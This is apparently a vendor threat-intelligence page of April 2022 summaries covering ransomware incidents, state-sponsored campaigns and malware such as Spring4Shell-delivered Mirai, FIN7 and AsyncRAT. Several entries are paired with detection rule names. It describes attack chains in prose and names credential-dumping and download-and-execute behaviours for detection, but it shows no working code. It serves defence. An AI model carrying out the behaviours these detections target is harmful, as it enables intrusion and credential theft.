The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.

We are committed to (read more…)

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

(read less…)

MetaStealer Malware

April 19, 2022

New information-stealing malware, META has been gaining popularity amongst cybercriminals. Research from SANS and BleepingComputer shares the malware has been distributed through malspam campaigns.

Potential Attack on Indian Electricity Grid by RedEcho

April 12, 2022

Potential Attack on Indian Electricity Grid by RedEcho

Industry: Critical Infrastructure | Level: Strategic | Source: RecordedFuture

Activity tracked by Recorded Future suspects a cyber attack was initiated by Chinese state-sponsored threat group, RedEcho, targeting India’s power grid. The attacks were specifically targeted in North India at seven Indian State Load Despatch Centres (SLDCs), to disrupt the flow and dispatch of electricity. Geographically the activity is near the border of Ladakh, the area is a focus of border conflict between India and China. An assessment from Recorded Future’s director Jonathan Condra offers the following on the intrusion activity “We believe that the targeting of the Indian power sector is likely for prepositioning purposes or intelligence collection with an eye towards having the capability to disrupt the Indian power sector in the event of kinetic conflict between China and India, and/or for signaling purposes to India – showcasing a capability for deterrence purposes. The targeting of the emergency system may be motivated by more traditional intelligence collection goals, but we cannot confirm at this time.”

ALPHV Ransomware Hits North Carolina A&T University

April 12, 2022

ALPHV Ransomware Hits North Carolina A&T University

Industry: Education | Level: Strategic | Source: TheRecord

ALPHV/Blackcat ransomware has compromised North Carolina A&T University as the institution has appeared on the ransomware group’s victim site. The attack appeared to have occurred between March 7th to 11th, with the attacks taking advantage of the smaller staff during the university’s spring break vacation. As reported by The Record the attack inhibited network communications that include “wireless connections, Blackboard instruction, single sign-on websites, VPN, Jabber, Qualtrics, Banner Document Management and Chrome River. Some of the services are still down.” In addition, personal information was also compromised includes social security numbers, financial data, SQL and email database information. The university is still recovering from the attack with services slowly being restored however the impact has affected students as some are unable to complete class assignments or participate in class with sessions being canceled due to the ongoing issues.

Nordex Group’s Cyber Attack

April 12, 2022

Nordex Group’s Cyber Attack

Industry: Manufacturing | Level: Strategic | Source: Nordex

The Nordex Group a wind turbine manufacturer headquartered in Germany suffered a cyberattack on March 31st, 2022 resulting in the “precautionary” shut down of their IT systems in various locations. The company maintains factories in Germany, China, Mexico, the United States, Brazil, Spain and India, with no details on the locations impacted. The company’s press statement states the intrusion activity was in the “early stage.” Adding that their incident response procedures were executed immediately, “The incident response team of internal and external security experts has been set up immediately in order to contain the issue and prevent further propagation and to assess the extent of potential exposure.” Nordex Group has not released any additional updates regarding the incident.

Lambda Malware, Denonia

April 12, 2022

Cado Security reports of Denonia, a new malware identified to target AWS Lambda deploying cryptominers. The Lambda components of the malware were observed during dynamic analysis, as when its execution failed, it prompted AWS Lambda environment variables.

Spring Exploits

April 12, 2022

Spring Exploits

Industry: N/A | Level: Tactical | Source: Trend Micro

Trend Micro research has kept track of exploits for Spring Core (CVE-2022-22965/Spring4Shell) and Spring Cloud Functions (CVE-2022-22963). The exploits lead to the installation of Mirai malware. The earliest exploitation attempts tracked by the security firm were in the Singapore region. Threat actors exploiting the vulnerability were able to upload a webshell to download Mirai botnet malware. Following a permission change with chmod from the downloading malware, it is then executed. Lastly, a shell script executes to download binaries from an attacker-owned server, to install compatible versions of Mirai samples with different CPU architectures onto the victim host.

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Spring4Shell – CVE-2022-22965
    • Spring-Cloud-Function – CVE-2022-22963
    • Potential Web Shell
    • File Download (Unix)
    • File Modified for Execution
    • File Execution (Unix)
    • Rare shell script execution

Mandiant’s Research of FIN7

April 12, 2022

Mandiant’s Research of FIN7

Industry: Financial Services, Food, Medical, Technology, Transportation, Utilities | Level: Tactical | Source: Mandiant

Mandiant provided updated research tracking the evolution of threat activity from threat group FIN7 between late 2021 to early 2022. The threat group has many associations with overlaps in many ransomware operations including Maze, Darkside, Blackmatter and ALPHV/Blackcat. Added by Mandiant, activity linking FIN7 and ransomware is identified though “Data theft extortion or ransomware deployment following FIN7-attributed activity at multiple organizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various ransomware operations over time.” A variety of industries are targeted by FIN7 including financial services, food, medical, technology, transportation, and utilities. Activity associated with FIN7 is abundant and Mandiant has been tracking multiple UNCs (Uncategorized threat groups), appearing to be affiliated with FIN7. The threat group has continuously refined its arsenal, for example, their PowerShell backdoor called PowerPlant has gone through multiple iterations since 2022 and has been observed more frequently in newer intrusions as opposed to older malware such as LOADOUT and/or GRIFFON.

  • Anvilogic Use Cases:
    • Suspicious Executable by CMD.exe
    • Windows Admin$ Share Access
    • Windows Service Created
    • Executable Process from Suspicious Folder
    • Common Reconnaissance Commands
    • RDP Connection
    • RDP Logon/Logoff Event
    • Rundll32 Command Line
    • Create/Add Local/Domain User
    • Query Registry

APT10/Cicada Espionage Attacks

April 12, 2022

APT10/Cicada Espionage Attacks

Industry: Government, Legal, Non-Governmental Organizations (NGOs), Pharmaceutical, Religious, Telecommunications | Level: Tactical | Source: Symantec

Symantec has been tracking an espionage campaign spanning over the course of several months (earliest sign mid-2021), tied to the Chinese APT group, APT10 (aka Cicada, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team.) The APT group has previously targeted Japanese-linked companies, however recently they have expanded their attacks globally including Europe, Asia, and North America. Entities targeted by the group include government, legal, religious, and non-governmental organizations (NGOs) however, current campaign appears to have a focus on government and NGO entities. Previously, APT10 has focused primarily on Japanese companies however, in the present campaign, only one victim in Japan was identified. Techniques used in the threat campaign have involved exploiting Microsoft Exchange Servers for initial access with various tools used during the attack phase including WinRAR for data archival, Mimikatz, WMIExec, NBTScan, and the group’s custom tool Sodamaster. The tool Sodamaster is capable of evading sandbox checks, host enumeration, and downloading additional payloads.

  • Anvilogic Use Cases:
    • Common Reconnaissance Commands
    • Utility Archive Data
    • Mimikatz
    • Wscript/Cscript Execution
    • WinRM Tools
    • Query Registry

New AsyncRAT & 3LOSH Crypter Malware Campaigns

April 12, 2022

New AsyncRAT & 3LOSH Crypter Malware Campaigns

Industry: N/A | Level: Tactical | Source: Cisco Talos

Cisco Talos’s latest research tracking malware distribution campaigns have identified the usage of 3LOSH crypter to obfuscate the deployment of commodity malware including AsyncRAT and LimeRAT. An ISO disk image initiates the infection chain with a VBScript that launches PowerShell to create and execute a series of scripts. Persistence is achieved through a scheduled task that’s created by the PowerShell script. Once the series of bat and ps1 scripts have been completed, the payload for the remote access trojan is injected and executed. These campaigns with 3LOSH crypter have been observed by Cisco Talos for several months and appear to be increasing activity with attackers turning to 3LOSH crypter to evade detection in corporate environments.

  • Anvilogic Scenario: 3LOSH Crypter – Malware Distribution Campaigns
  • Anvilogic Use Cases:
    • Wscript/Cscript Execution
    • Suspicious Executable by CMD.exe
    • Download exe|msi|bat Proxy
    • Rare remote thread
    • Create/Modify Schtasks

Colibri Loader

April 12, 2022

Malwarebytes provided analysis on Colibri Loader, a malware that emerged in underground forums in August 2021. The malware is advertised to “people who have large volumes of traffic and lack of time to work out the material.“